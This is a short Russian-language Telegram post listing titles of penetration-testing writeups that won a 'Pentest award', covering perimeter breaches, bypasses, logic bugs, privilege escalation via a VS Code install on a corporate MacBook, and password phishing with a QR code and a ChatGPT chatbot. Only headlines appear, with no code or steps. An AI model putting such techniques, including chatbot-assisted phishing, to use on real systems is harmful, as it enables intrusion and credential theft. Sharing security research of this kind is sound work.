Пробив периметра. Три райтапа победителя Pentest award в номинации «Пробив».
Взлом Seedr. Райтап — победитель Pentest award в номинации «Пробив».
Нескучные байпасы. Работы — победители Pentest award в номинации «Bypass».
**ck the logic. Три исследования логических багов получившие Pentest award.
LPE на казенном макбуке. Злоупотребляем установкой VS Code для локального повышения привелегий.
ChatGPT на рыбалке. Выманиваем пароль при помощи QR-кода и чат-бота.
#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM